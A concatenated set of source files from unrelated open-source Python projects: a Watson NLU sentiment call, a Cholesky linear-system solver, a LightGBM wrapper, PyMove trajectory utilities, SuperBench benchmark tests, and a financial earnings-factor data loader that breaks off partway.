        "https://api.eu-gb.natural-language-understanding.watson.cloud.ibm.com/instances/817c5ca5-adff-4b02-a2fe-8810bae23791/v1/analyze",
        api_key=nlu_api_key,
        text=text,
        version="2021-08-01",
        features={
            "sentiment": {},
        },
        return_analyzed_text=True)
    if json_result and "sentiment" in json_result:
        return json_result["sentiment"]["document"]["label"]
    # Bug fix: make the failure path explicit instead of implicitly
    # returning None by falling off the end of the function.
    return None
lab/square_roots.py | Blahodatny/lab2 | 1 | 12762477 | <reponame>Blahodatny/lab2
import math
from termcolor import colored
from ui import UI
class SquareRoots:
    """Solve the linear system A·x = b with the square-roots (Cholesky)
    method for a symmetric matrix.

    ``matrix`` is the n x (n+1) augmented matrix [A | b]; ``eps`` controls
    the number of decimals kept when rounding results.  Every step is
    printed (teaching aid).  Construction immediately runs the whole
    pipeline: factorisation, solve, determinant and inverse.
    """
    def __init__(self, matrix, n, eps):
        # Augmented system [A | b], its order n, and the rounding precision.
        self.matrix = matrix
        self.n = n
        self.eps = eps
        # U (upper triangular) and its transpose, filled by get_u().
        self.u_matrix = []
        self.ut_matrix = []
        p = colored('SQUARE ROOTS', 'green')
        print(p)
        self.get_u()
        self.x = self.get_roots()
        self.determinant = self.get_determinant()
        self.reverse = self.get_reverse()
    def get_u(self):
        # Factorise A = Uᵀ·U (Cholesky), printing every element.
        # First allocate n x n zero matrices for U and Uᵀ.
        for k in range(self.n):
            self.u_matrix.append([0] * self.n)
            self.ut_matrix.append([0] * self.n)
        for i in range(self.n):
            for j in range(self.n):
                if i == j:
                    # Diagonal: u_ii = sqrt(a_ii - sum_k u_ki^2).
                    m = 0
                    for k in range(i):
                        m = m + pow(self.u_matrix[k][i], 2)
                    print('u(', i, ', ', j, ') = sqrt(', self.matrix[i][i], ' - ', m, ') = ', end='')
                    self.u_matrix[i][i] = math.sqrt(self.matrix[i][i] - m)
                    print(self.u_matrix[i][j])
                if i < j:
                    # Above the diagonal: u_ij = (a_ij - sum_k u_ki*u_kj) / u_ii.
                    m = 0
                    for k in range(i):
                        m = m + self.u_matrix[k][i] * self.u_matrix[k][j]
                    print('u(', i, ', ', j, ') = (', self.matrix[i][j], ' - ', m, ') / ', self.u_matrix[i][i], ' = ',
                          end='')
                    self.u_matrix[i][j] = (self.matrix[i][j] - m) / self.u_matrix[i][i]
                    print(self.u_matrix[i][j])
                if i > j:
                    # Below the diagonal U is zero by construction.
                    self.u_matrix[i][j] = 0
                    print('u(', i, ', ', j, ') = 0')
                # Mirror each element into the transpose as we go.
                self.ut_matrix[j][i] = self.u_matrix[i][j]
        print()
        print('U-matrix:')
        UI.print_matrix(self.u_matrix, self.n)
        print()
        print('U^T-matrix:')
        UI.print_matrix(self.ut_matrix, self.n)
        print()
    def get_roots(self):
        # Solve Uᵀ·y = b (forward substitution), then U·x = y (back
        # substitution); returns the rounded solution vector x.
        print('calculating roots')
        y = [0] * self.n
        x = [0] * self.n
        for i in range(self.n):
            m = 0
            for k in range(0, i):
                m = m + self.ut_matrix[i][k] * y[k]
            # b_i lives in the augmented column self.matrix[i][n].
            y[i] = (self.matrix[i][self.n] - m) / self.ut_matrix[i][i]
            print('y[', i, '] = (', self.matrix[i][self.n], ' - ', m, ') / ', self.ut_matrix[i][i], ' = ', y[i])
        print()
        for i in range(self.n - 1, -1, -1):
            m = 0
            for k in range(i + 1, self.n):
                m = m + self.u_matrix[i][k] * x[k]
            x[i] = (y[i] - m) / self.u_matrix[i][i]
            print('x[', i, '] = ', y[i], ' - ', m, ' = ', x[i])
            # NOTE(review): rounding to len(str(eps)) digits is unusual —
            # e.g. eps=0.01 rounds to 4 decimals; confirm this matches intent.
            x[i] = round(x[i], len(str(self.eps)))
        print()
        r = colored('Roots:', 'green')
        print(r)
        for i in range(self.n):
            print('x[', i + 1, '] = ', x[i])
        print()
        return x
    def get_determinant(self):
        # det(A) = (product of U's diagonal)^2, rounded like the roots.
        det = 1
        for i in range(self.n):
            det = det * self.u_matrix[i][i]
        det = pow(det, 2)
        det = round(det, len(str(self.eps)))
        r = colored('Determinant', 'green')
        print(r, end=' ')
        print(' = ', det)
        print()
        return det
    def get_reverse(self):
        # Compute A^-1 from the factorisation, exploiting symmetry:
        # only the upper triangle is computed, then mirrored.
        reverse = []
        for i in range(self.n):
            reverse.append([0] * self.n)
        for j in range(self.n - 1, -1, -1):
            for i in range(j, -1, -1):
                if j == i:
                    # Diagonal entry of the inverse.
                    # NOTE(review): the textbook recurrence uses the already
                    # computed inverse entries here (sum u_ik * x_ki), but this
                    # code multiplies by ut_matrix[i][k], which is zero for
                    # k > i — verify against the reference formula.
                    m = 0
                    for k in range(i + 1, self.n):
                        m = m + self.u_matrix[i][k] * self.ut_matrix[i][k]
                    reverse[i][i] = ((1 / self.u_matrix[i][i]) - m) / self.u_matrix[i][i]
                else:
                    # Off-diagonal entry.
                    # NOTE(review): likewise, ut_matrix[k][j] is used where the
                    # standard back-substitution uses reverse[k][j] — confirm.
                    m = 0
                    for k in range(i + 1, self.n):
                        m = m + self.u_matrix[i][k] * self.ut_matrix[k][j]
                    reverse[i][j] = -m / self.u_matrix[i][i]
                    # A is symmetric, so its inverse is too.
                    reverse[j][i] = reverse[i][j]
        print('Reverse matrix:')
        UI.print_matrix(reverse, self.n)
        print()
        return reverse
| 3.421875 | 3 |
autox/autox_server/model/lgb_with_fe.py | fanghy06/AutoX | 499 | 12762478 | import warnings
warnings.filterwarnings('ignore')
from autox.autox_server.model import model_util
def lgb_with_fe(G_df_dict, G_data_info, G_hist, is_train, remain_time, params, lgb_para_dict, data_name, exp_name):
    """Train/apply a LightGBM model on the feature-engineered table
    ('BIG_FE') and return the remaining time budget after the run.

    Fix: a dataset-extraction artifact ('| 2.09375 | 2 |') fused onto the
    return line made the original statement syntactically invalid.
    """
    remain_time = model_util.lgb_model(
        G_df_dict['BIG_FE'], G_data_info, G_hist, is_train, remain_time,
        exp_name, params, lgb_para_dict, data_name)
    return remain_time
pymove/utils/trajectories.py | safarzadeh-reza/PyMove | 1 | 12762479 | <reponame>safarzadeh-reza/PyMove
"""
Data operations.
read_csv,
invert_dict,
flatten_dict,
flatten_columns,
shift,
fill_list_with_new_values,
object_for_array,
column_to_array
"""
from itertools import chain
from typing import Any, Dict, List, Optional, Text, Union
import numpy as np
from numpy import ndarray
from pandas import DataFrame, Series
from pandas import read_csv as _read_csv
from pandas._typing import FilePathOrBuffer
from pymove.core.dataframe import MoveDataFrame
from pymove.utils.constants import DATETIME, LATITUDE, LONGITUDE, TRAJ_ID, TYPE_PANDAS
from pymove.utils.math import is_number
def read_csv(
    filepath_or_buffer: FilePathOrBuffer,
    latitude: Optional[Text] = LATITUDE,
    longitude: Optional[Text] = LONGITUDE,
    datetime: Optional[Text] = DATETIME,
    traj_id: Optional[Text] = TRAJ_ID,
    type_: Optional[Text] = TYPE_PANDAS,
    n_partitions: Optional[int] = 1,
    **kwargs
):
    """
    Read a `csv` file and wrap it in a MoveDataFrame.

    Parameters
    ----------
    filepath_or_buffer : str or path object or file-like object
        Any valid string path, URL (http, ftp, s3, gs, file) or object
        with a read() method, exactly as accepted by pandas.read_csv.
    latitude : str, optional
        Column name of the latitude feature, by default 'lat'
    longitude : str, optional
        Column name of the longitude feature, by default 'lon'
    datetime : str, optional
        Column name of the datetime feature, by default 'datetime'
    traj_id : str, optional
        Column name of the trajectory-id feature, by default 'id'
    type_ : str, optional
        Type of the MoveDataFrame to build, by default 'pandas'
    n_partitions : int, optional
        Number of partitions for DaskMoveDataFrame, by default 1
    **kwargs : Pandas read_csv arguments
        https://pandas.pydata.org/docs/reference/api/pandas.read_csv.html?highlight=read_csv#pandas.read_csv

    Returns
    -------
    MoveDataFrameAbstract subclass
        Trajectory data
    """
    frame = _read_csv(filepath_or_buffer, **kwargs)
    return MoveDataFrame(
        frame, latitude, longitude, datetime, traj_id, type_, n_partitions
    )
def invert_dict(d: Dict) -> Dict:
    """
    Swap keys and values: {k: v} becomes {v: k}.

    Values must be hashable; duplicate values collapse to the last key
    encountered in iteration order.

    Parameters
    ----------
    d : dict
        dictionary to be inverted

    Returns
    -------
    dict
        inverted dict
    """
    return dict(zip(d.values(), d.keys()))
def flatten_dict(
    d: Dict, parent_key: Optional[Text] = '', sep: Optional[Text] = '_'
) -> Dict:
    """
    Recursively flatten a nested dictionary, joining key paths with ``sep``.

    A non-dict input is wrapped as {parent_key: d}.

    Parameters
    ----------
    d: dict
        Dictionary to be flattened
    parent_key: str, optional
        Key prefix inherited from the enclosing dictionary, by default ''
    sep: str, optional
        Separator between parent and child keys, by default '_'

    Returns
    -------
    dict
        Flattened dictionary

    Examples
    --------
    >>> flatten_dict({'a': 1, 'b': {'c': 2, 'd': 3}})
    {'a': 1, 'b_c': 2, 'b_d': 3}
    """
    if not isinstance(d, dict):
        return {parent_key: d}
    flat = {}
    for key, value in d.items():
        path = sep.join((parent_key, key)) if parent_key else key
        if isinstance(value, dict):
            flat.update(flatten_dict(value, path, sep=sep))
        else:
            flat[path] = value
    return flat
def flatten_columns(data: DataFrame, columns: List) -> DataFrame:
    """
    Expand columns containing dictionaries into individual columns.

    For each listed column, every key of the (possibly nested) dicts it
    holds becomes a new column named '<col>_<flattenedkey>' (lowercased);
    rows missing a key get NaN.  The original columns are dropped.

    Parameters
    ----------
    data: DataFrame
        Dataframe with columns to be flattened
    columns: list
        Columns of ``data`` containing dictionaries (a single name is
        also accepted)

    Returns
    -------
    dataframe
        Copy of ``data`` with the flattened columns

    Examples
    --------
    >>> data = pd.DataFrame({'col1': [1], 'col2': [{'a': 1, 'b': {'c': 2}}]})
    >>> flatten_columns(data, ['col2'])
       col1  col2_a  col2_b_c
    0     1       1         2
    """
    data = data.copy()
    if not isinstance(columns, list):
        columns = [columns]
    for col in columns:
        data[f'{col}_'] = data[f'{col}'].apply(flatten_dict)
        keys = set(chain(*data[f'{col}_'].apply(lambda column: column.keys())))
        for key in keys:
            column_name = f'{col}_{key}'.lower()
            # np.nan instead of the np.NaN alias (removed in NumPy 2.0);
            # dict.get replaces the key-in-keys() double lookup.
            data[column_name] = data[f'{col}_'].apply(
                lambda cell: cell.get(key, np.nan)
            )
    cols_to_drop = [(f'{col}', f'{col}_') for col in columns]
    return data.drop(columns=list(chain(*cols_to_drop)))
def shift(
    arr: Union[List, Series, ndarray],
    num: int,
    fill_value: Optional[Any] = None
) -> ndarray:
    """
    Shift the elements of ``arr`` by ``num`` positions.

    Positive ``num`` pulls elements toward higher indexes; negative pulls
    them toward lower indexes.  Vacated slots get ``fill_value``; when it
    is None, a dtype-appropriate default is chosen (False / 0 / NaN).
    ``num == 0`` returns the input object itself (no copy), matching the
    original behavior.

    Parameters
    ----------
    arr : array
        The array to be shifted
    num : int
        Number of positions to shift (positive or negative)
    fill_value : float, optional
        Scalar used for newly introduced missing values, by default None

    Returns
    -------
    array
        Shifted array with the same shape and dtype as the input.

    References
    ----------
    https://stackoverflow.com/questions/30399534/shift-elements-in-a-numpy-array
    """
    result = np.empty_like(arr)
    if fill_value is None:
        # Pick a neutral filler matching the output dtype.
        dtype = result.dtype
        if np.issubdtype(dtype, np.bool_):
            fill_value = False
        elif np.issubdtype(dtype, np.integer):
            fill_value = 0
        else:
            fill_value = np.nan
    if num == 0:
        return arr
    if num > 0:
        result[:num] = fill_value
        result[num:] = arr[:-num]
    else:
        result[num:] = fill_value
        result[:num] = arr[-num:]
    return result
def fill_list_with_new_values(original_list: List, new_list_values: List):
    """
    Copy ``new_list_values`` over the front of ``original_list`` in place.

    The first ``len(new_list_values)`` slots are overwritten; the tail
    keeps its old values.  If the new list is longer, the original list
    grows accordingly (slice-assignment semantics).

    Parameters
    ----------
    original_list : list.
        The list whose leading elements are replaced
    new_list_values : list.
        The replacement values
    """
    original_list[:len(new_list_values)] = new_list_values
def object_for_array(object_: Text) -> ndarray:
    """
    Parse a bracketed, comma-separated string (e.g. "[1, 2, 3]") into a
    numpy array.

    When the first token looks numeric the array is float32; otherwise
    the dtype is object.  None is returned unchanged.

    Parameters
    ----------
    object : str
        string representing a list of integers or strings

    Returns
    -------
    array
        the parsed array (or None)
    """
    if object_ is None:
        return object_
    # Strip the surrounding brackets, split on commas, trim whitespace.
    tokens = object_[1:-1].split(',')
    parsed = np.array([token.strip() for token in tokens])
    if is_number(parsed[0]):
        return parsed.astype(np.float32)
    return parsed.astype('object_')
def column_to_array(data: DataFrame, column: Text):
    """
    Return a copy of ``data`` in which the string values of ``column``
    were parsed into arrays via object_for_array.

    Parameters
    ----------
    data : dataframe
        The input trajectory data
    column : str
        Name of the column to convert

    Raises
    ------
    KeyError
        When ``column`` is not present in ``data``.
    """
    frame = data.copy()
    if column not in frame:
        raise KeyError(
            'Dataframe must contain a %s column' % column
        )
    frame[column] = frame[column].apply(object_for_array)
    return frame
| 3.265625 | 3 |
tests/benchmarks/micro_benchmarks/test_micro_base.py | yangpanMS/superbenchmark | 59 | 12762480 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Tests for MicroBenchmark and MicroBenchmarkWithInvoke modules."""
import os
import re
import shutil
from superbench.benchmarks import BenchmarkType, ReturnCode
from superbench.benchmarks.micro_benchmarks import MicroBenchmark, MicroBenchmarkWithInvoke
class FakeMicroBenchmark(MicroBenchmark):
    """Fake benchmark inherit from MicroBenchmark.

    Minimal concrete subclass used to exercise the base-class plumbing;
    its _benchmark step is a no-op that always reports success.
    """
    def __init__(self, name, parameters=''):
        """Constructor.
        Args:
            name: benchmark name.
            parameters: benchmark parameters.
        """
        super().__init__(name, parameters)
    def _benchmark(self):
        """Implementation for benchmarking.
        Return:
            True if run benchmark successfully.
        """
        return True
class FakeMicroBenchmarkWithInvoke(MicroBenchmarkWithInvoke):
    """Fake benchmark inherit from MicroBenchmarkWithInvoke.

    Minimal concrete subclass used by the tests below: it invokes its
    configured binary with a fixed argument string and parses two float
    "cost" values back out of the raw output.
    """
    def __init__(self, name, parameters=''):
        """Constructor.
        Args:
            name: benchmark name.
            parameters: benchmark parameters.
        """
        super().__init__(name, parameters)
    def _preprocess(self):
        """Preprocess/preparation operations before the benchmarking.
        Return:
            True if _preprocess() succeed.
        """
        if not super()._preprocess():
            return False
        # Build the single command line; _args.bin_dir is resolved by the
        # base class from _bin_name during preprocessing.
        command = os.path.join(self._args.bin_dir, self._bin_name)
        command += " -n 'cost1: 10.2, cost2: 20.2'"
        self._commands.append(command)
        return True
    def _process_raw_result(self, cmd_idx, raw_output):
        """Function to process raw results and save the summarized results.
        self._result.add_raw_data() and self._result.add_result() need to be called to save the results.
        Args:
            cmd_idx (int): the index of command corresponding with the raw_output.
            raw_output (str): raw output string of the micro-benchmark.
        Return:
            True if the raw output string is valid and result can be extracted.
        """
        self._result.add_raw_data('raw_output_' + str(cmd_idx), raw_output)
        # Expect exactly two decimal numbers (cost1 and cost2) in the output.
        pattern = r'\d+\.\d+'
        result = re.findall(pattern, raw_output)
        if len(result) != 2:
            return False
        try:
            result = [float(item) for item in result]
        except BaseException:
            return False
        self._result.add_result('cost1', result[0])
        self._result.add_result('cost2', result[1])
        return True
def test_micro_benchmark_base():
    """Test MicroBenchmark: a trivial benchmark runs to SUCCESS and
    numeric results are summarized and stored."""
    benchmark = FakeMicroBenchmark('fake')
    assert (benchmark._benchmark_type == BenchmarkType.MICRO)
    assert (benchmark.run())
    assert (benchmark.return_code == ReturnCode.SUCCESS)
    # Summarized value is 3.5 for [1..6] (presumably the mean) and the
    # raw list is stored unchanged.
    benchmark._process_numeric_result('metric1', [1, 2, 3, 4, 5, 6])
    assert (benchmark.result['metric1'] == [3.5])
    assert (benchmark.raw_data['metric1'] == [[1, 2, 3, 4, 5, 6]])
def test_micro_benchmark_with_invoke_base():
    """Test MicroBenchmarkWithInvoke: error paths for a missing binary
    name / binary, then a successful run via the system 'echo' binary."""
    # Negative case - MICROBENCHMARK_BINARY_NAME_NOT_SET.
    benchmark = FakeMicroBenchmarkWithInvoke('fake')
    assert (benchmark._benchmark_type == BenchmarkType.MICRO)
    assert (benchmark.run() is False)
    assert (benchmark.return_code == ReturnCode.MICROBENCHMARK_BINARY_NAME_NOT_SET)
    # Negative case - MICROBENCHMARK_BINARY_NOT_EXIST.
    benchmark = FakeMicroBenchmarkWithInvoke('fake')
    benchmark._bin_name = 'not_existed_binary'
    assert (benchmark.run() is False)
    assert (benchmark.return_code == ReturnCode.MICROBENCHMARK_BINARY_NOT_EXIST)
    # Positive case: 'echo' simply prints the argument string, so the
    # fake's regex finds the two cost values in the raw output.
    benchmark = FakeMicroBenchmarkWithInvoke('fake')
    benchmark._bin_name = 'echo'
    assert (benchmark.run())
    assert (benchmark.return_code == ReturnCode.SUCCESS)
    assert (os.path.join(benchmark._args.bin_dir, benchmark._bin_name) == shutil.which(benchmark._bin_name))
    assert (benchmark._commands[0] == (shutil.which(benchmark._bin_name) + " -n 'cost1: 10.2, cost2: 20.2'"))
    assert (benchmark.raw_data['raw_output_0'] == ['cost1: 10.2, cost2: 20.2'])
    assert (benchmark.result['cost1'] == [10.2])
    assert (benchmark.result['cost2'] == [20.2])
financial/calc_engines/factor_earning_cal.py | wangjiehui11235/panther | 0 | 12762481 | # -*- coding: utf-8 -*-
import pdb,importlib,inspect,time,datetime,json
# from PyFin.api import advanceDateByCalendar
# from data.polymerize import DBPolymerize
from data.storage_engine import StorageEngine
import time
import pandas as pd
import numpy as np
from datetime import timedelta, datetime
from financial import factor_earning
from data.model import BalanceMRQ, BalanceTTM, BalanceReport
from data.model import CashFlowTTM, CashFlowReport
from data.model import IndicatorReport
from data.model import IncomeReport, IncomeTTM
from vision.db.signletion_engine import *
from data.sqlengine import sqlEngine
# pd.set_option('display.max_columns', None)
# pd.set_option('display.max_rows', None)
# from ultron.cluster.invoke.cache_data import cache_data
class CalcEngine(object):
    """Calculation engine for the earnings ("factor_earning") factor set.

    Workflow: ``local_run(trade_date)`` loads point-in-time fundamental data
    (report / MRQ / TTM tables) with ``sqlEngine``, computes the earnings
    factors via ``factor_earning.FactorEarning``, and persists the result
    through ``StorageEngine``.
    """

    # NOTE(review): mutable default argument for ``methods`` is shared across
    # calls; it is only read here, so this is benign, but worth confirming.
    def __init__(self, name, url, methods=[{'packet': 'financial.factor_earning', 'class': 'FactorEarning'}, ]):
        self._name = name          # engine name
        self._methods = methods    # factor packet/class descriptors
        self._url = url            # destination database URL

    def get_trade_date(self, trade_date, n, days=365):
        """Return the trade date ``n * days`` calendar days before ``trade_date``.

        If the computed date is not a trading day, step backwards one day at
        a time until the nearest earlier trading day is found.

        :param days: length of one step, in calendar days (default one year)
        :param trade_date: current trade date, formatted YYYYMMDD
        :param n: number of steps to go back
        :return: trade date as a YYYYMMDD string
        """
        # NOTE(review): ``SyncUtil`` is presumably provided by the
        # ``vision.db.signletion_engine`` star import — confirm.
        syn_util = SyncUtil()
        trade_date_sets = syn_util.get_all_trades('001002', '19900101', trade_date)
        trade_date_sets = trade_date_sets['TRADEDATE'].values
        time_array = datetime.strptime(str(trade_date), "%Y%m%d")
        time_array = time_array - timedelta(days=days) * n
        date_time = int(datetime.strftime(time_array, "%Y%m%d"))
        if str(date_time) < min(trade_date_sets):
            # Older than any known trading day: return as-is.
            # print('date_time %s is out of trade_date_sets' % date_time)
            return str(date_time)
        else:
            # Walk backwards by decrementing the YYYYMMDD integer; invalid
            # intermediate values simply fail the membership test.
            while str(date_time) not in trade_date_sets:
                date_time = date_time - 1
            # print('trade_date pre %s year %s' % (n, date_time))
            return str(date_time)

    def _func_sets(self, method):
        # Filter out private/protected attributes; keep public callables only.
        return list(filter(lambda x: not x.startswith('_') and callable(getattr(method, x)), dir(method)))

    def loading_data(self, trade_date):
        """Load the fundamental data needed by the earnings factors.

        Fetches report, MRQ and TTM data for all stocks on the given trade
        day, plus income data for each of the previous four/five years.

        :param trade_date: trade date formatted 'YYYY-MM-DD'
        :return: tuple ``(tp_earning, ttm_earning, ttm_earning_5y)``
        """
        # Normalize the date format from 'YYYY-MM-DD' to 'YYYYMMDD'.
        time_array = datetime.strptime(trade_date, "%Y-%m-%d")
        trade_date = datetime.strftime(time_array, '%Y%m%d')
        # Reference dates 1..5 "years" back (trading-day adjusted).
        trade_date_pre_year = self.get_trade_date(trade_date, 1)
        trade_date_pre_year_2 = self.get_trade_date(trade_date, 2)
        trade_date_pre_year_3 = self.get_trade_date(trade_date, 3)
        trade_date_pre_year_4 = self.get_trade_date(trade_date, 4)
        trade_date_pre_year_5 = self.get_trade_date(trade_date, 5)
        engine = sqlEngine()
        # Bookkeeping columns dropped from every fetched frame below.
        columns = ['COMPCODE', 'PUBLISHDATE', 'ENDDATE', 'symbol', 'company_id', 'trade_date']
        # Report Data
        cash_flow_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowReport,
                                                                         [CashFlowReport.LABORGETCASH,
                                                                          CashFlowReport.FINALCASHBALA,
                                                                          ], dates=[trade_date])
        for column in columns:
            if column in list(cash_flow_sets.keys()):
                cash_flow_sets = cash_flow_sets.drop(column, axis=1)
        cash_flow_sets = cash_flow_sets.rename(
            columns={'LABORGETCASH': 'goods_sale_and_service_render_cash',  # cash received from selling goods / rendering services
                     'FINALCASHBALA': 'cash_and_equivalents_at_end',  # cash and cash equivalents at period end
                     })
        income_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                      [IncomeReport.BIZTOTINCO,
                                                                       IncomeReport.BIZINCO,
                                                                       IncomeReport.PERPROFIT,
                                                                       IncomeReport.PARENETP,
                                                                       IncomeReport.NETPROFIT,
                                                                       ], dates=[trade_date])
        for column in columns:
            if column in list(income_sets.keys()):
                income_sets = income_sets.drop(column, axis=1)
        income_sets = income_sets.rename(columns={'NETPROFIT': 'net_profit',  # net profit
                                                  'BIZTOTINCO': 'total_operating_revenue',  # total operating revenue
                                                  'BIZINCO': 'operating_revenue',  # operating revenue
                                                  'PERPROFIT': 'operating_profit',  # operating profit
                                                  'PARENETP': 'np_parent_company_owners',  # net profit attributable to parent company owners
                                                  })
        indicator_sets = engine.fetch_fundamentals_pit_extend_company_id(IndicatorReport,
                                                                         [
                                                                             IndicatorReport.NETPROFITCUT,
                                                                             # net profit excluding non-recurring gains/losses
                                                                             IndicatorReport.MGTEXPRT
                                                                         ], dates=[trade_date])
        for column in columns:
            if column in list(indicator_sets.keys()):
                indicator_sets = indicator_sets.drop(column, axis=1)
        indicator_sets = indicator_sets.rename(columns={'NETPROFITCUT': 'adjusted_profit',  # net profit excluding non-recurring gains/losses
                                                        })
        balance_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceReport,
                                                                       [BalanceReport.PARESHARRIGH,
                                                                        ], dates=[trade_date])
        for column in columns:
            if column in list(balance_sets.keys()):
                balance_sets = balance_sets.drop(column, axis=1)
        balance_sets = balance_sets.rename(columns={'PARESHARRIGH': 'equities_parent_company_owners',  # total equity attributable to parent company shareholders
                                                    })
        income_sets_pre_year_1 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                                 [IncomeReport.BIZINCO,  # operating revenue
                                                                                  IncomeReport.NETPROFIT,  # net profit
                                                                                  ], dates=[trade_date_pre_year])
        for column in columns:
            if column in list(income_sets_pre_year_1.keys()):
                income_sets_pre_year_1 = income_sets_pre_year_1.drop(column, axis=1)
        income_sets_pre_year_1 = income_sets_pre_year_1.rename(columns={'NETPROFIT': 'net_profit_pre_year_1',  # net profit
                                                                        'BIZINCO': 'operating_revenue_pre_year_1',
                                                                        # operating revenue
                                                                        })
        income_sets_pre_year_2 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                                 [IncomeReport.BIZINCO,
                                                                                  IncomeReport.NETPROFIT,
                                                                                  ], dates=[trade_date_pre_year_2])
        for column in columns:
            if column in list(income_sets_pre_year_2.keys()):
                income_sets_pre_year_2 = income_sets_pre_year_2.drop(column, axis=1)
        income_sets_pre_year_2 = income_sets_pre_year_2.rename(columns={'NETPROFIT': 'net_profit_pre_year_2',  # net profit
                                                                        'BIZINCO': 'operating_revenue_pre_year_2',
                                                                        # operating revenue
                                                                        })
        income_sets_pre_year_3 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                                 [IncomeReport.BIZINCO,
                                                                                  IncomeReport.NETPROFIT,
                                                                                  ], dates=[trade_date_pre_year_3])
        for column in columns:
            if column in list(income_sets_pre_year_3.keys()):
                income_sets_pre_year_3 = income_sets_pre_year_3.drop(column, axis=1)
        income_sets_pre_year_3 = income_sets_pre_year_3.rename(columns={'NETPROFIT': 'net_profit_pre_year_3',  # net profit
                                                                        'BIZINCO': 'operating_revenue_pre_year_3',
                                                                        # operating revenue
                                                                        })
        income_sets_pre_year_4 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
                                                                                 [IncomeReport.BIZINCO,
                                                                                  IncomeReport.NETPROFIT,
                                                                                  ], dates=[trade_date_pre_year_4])
        for column in columns:
            if column in list(income_sets_pre_year_4.keys()):
                income_sets_pre_year_4 = income_sets_pre_year_4.drop(column, axis=1)
        income_sets_pre_year_4 = income_sets_pre_year_4.rename(columns={'NETPROFIT': 'net_profit_pre_year_4',  # net profit
                                                                        'BIZINCO': 'operating_revenue_pre_year_4',
                                                                        # operating revenue
                                                                        })
        # Combine all the report-level frames into one wide frame.
        tp_earning = pd.merge(cash_flow_sets, income_sets, how='outer', on='security_code')
        tp_earning = pd.merge(indicator_sets, tp_earning, how='outer', on='security_code')
        tp_earning = pd.merge(balance_sets, tp_earning, how='outer', on='security_code')
        tp_earning = pd.merge(income_sets_pre_year_1, tp_earning, how='outer', on='security_code')
        tp_earning = pd.merge(income_sets_pre_year_2, tp_earning, how='outer', on='security_code')
        tp_earning = pd.merge(income_sets_pre_year_3, tp_earning, how='outer', on='security_code')
        tp_earning = pd.merge(income_sets_pre_year_4, tp_earning, how='outer', on='security_code')
        # MRQ (most-recent-quarter) data
        balance_mrq_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceMRQ,
                                                                           [BalanceMRQ.TOTASSET,  # total assets
                                                                            BalanceMRQ.PARESHARRIGH,  # total equity attributable to parent company shareholders
                                                                            BalanceMRQ.RIGHAGGR,  # total owners' (shareholders') equity
                                                                            BalanceMRQ.LONGBORR,  # long-term loans
                                                                            ], dates=[trade_date])
        for column in columns:
            if column in list(balance_mrq_sets.keys()):
                balance_mrq_sets = balance_mrq_sets.drop(column, axis=1)
        balance_mrq_sets = balance_mrq_sets.rename(columns={'TOTASSET': 'total_assets_mrq',
                                                            'PARESHARRIGH': 'equities_parent_company_owners_mrq',
                                                            # total equity attributable to parent company shareholders
                                                            'RIGHAGGR': 'total_owner_equities_mrq',  # total owners' (shareholders') equity
                                                            'LONGBORR': 'longterm_loan_mrq',  # long-term loans
                                                            })
        # NOTE(review): despite the "_pre" suffix this fetch also uses the
        # current ``trade_date`` — confirm whether a prior-period date
        # (e.g. ``trade_date_pre_year``) was intended.
        balance_mrq_sets_pre = engine.fetch_fundamentals_pit_extend_company_id(BalanceMRQ,
                                                                               [BalanceMRQ.TOTASSET,  # total assets
                                                                                BalanceMRQ.RIGHAGGR,  # total owners' (shareholders') equity
                                                                                BalanceMRQ.LONGBORR,  # long-term loans
                                                                                ], dates=[trade_date])
        for column in columns:
            if column in list(balance_mrq_sets_pre.keys()):
                balance_mrq_sets_pre = balance_mrq_sets_pre.drop(column, axis=1)
        balance_mrq_sets_pre = balance_mrq_sets_pre.rename(columns={'TOTASSET': 'total_assets_mrq_pre',
                                                                    'RIGHAGGR': 'total_owner_equities_mrq_pre',
                                                                    # total owners' (shareholders') equity
                                                                    'LONGBORR': 'longterm_loan_mrq_pre',  # long-term loans
                                                                    })
        # TTM (trailing-twelve-month) data
        cash_flow_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowTTM,
                                                                             [CashFlowTTM.FINNETCFLOW,
                                                                              ], dates=[trade_date])
        for column in columns:
            if column in list(cash_flow_ttm_sets.keys()):
                cash_flow_ttm_sets = cash_flow_ttm_sets.drop(column, axis=1)
        cash_flow_ttm_sets = cash_flow_ttm_sets.rename(columns={'FINNETCFLOW': 'net_finance_cash_flow'})
        income_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
                                                                          [IncomeTTM.BIZINCO,  # operating revenue
                                                                           IncomeTTM.NETPROFIT,  # net profit
                                                                           IncomeTTM.MANAEXPE,  # administration expense
                                                                           IncomeTTM.BIZTOTINCO,  # total operating revenue
                                                                           IncomeTTM.TOTPROFIT,  # total profit
                                                                           IncomeTTM.FINEXPE,  # financial expense
                                                                           IncomeTTM.INTEINCO,  # interest income
                                                                           IncomeTTM.SALESEXPE,  # sale expense
                                                                           IncomeTTM.BIZTOTCOST,  # total operating cost
                                                                           IncomeTTM.PERPROFIT,  # operating profit
                                                                           IncomeTTM.PARENETP,  # net profit attributable to parent company owners
                                                                           IncomeTTM.BIZCOST,  # operating cost
                                                                           IncomeTTM.ASSOINVEPROF,  # investment income from associates and joint ventures
                                                                           IncomeTTM.BIZTAX,  # operating taxes and surcharges
                                                                           IncomeTTM.ASSEIMPALOSS,  # asset impairment loss
                                                                           ], dates=[trade_date])
        for column in columns:
            if column in list(income_ttm_sets.keys()):
                income_ttm_sets = income_ttm_sets.drop(column, axis=1)
        income_ttm_sets = income_ttm_sets.rename(columns={'BIZINCO': 'operating_revenue',  # operating revenue
                                                          'NETPROFIT': 'net_profit',  # net profit
                                                          'MANAEXPE': 'administration_expense',  # administration expense
                                                          'BIZTOTINCO': 'total_operating_revenue',  # total operating revenue
                                                          'TOTPROFIT': 'total_profit',  # total profit
                                                          'FINEXPE': 'financial_expense',  # financial expense
                                                          'INTEINCO': 'interest_income',  # interest income
                                                          'SALESEXPE': 'sale_expense',  # sale expense
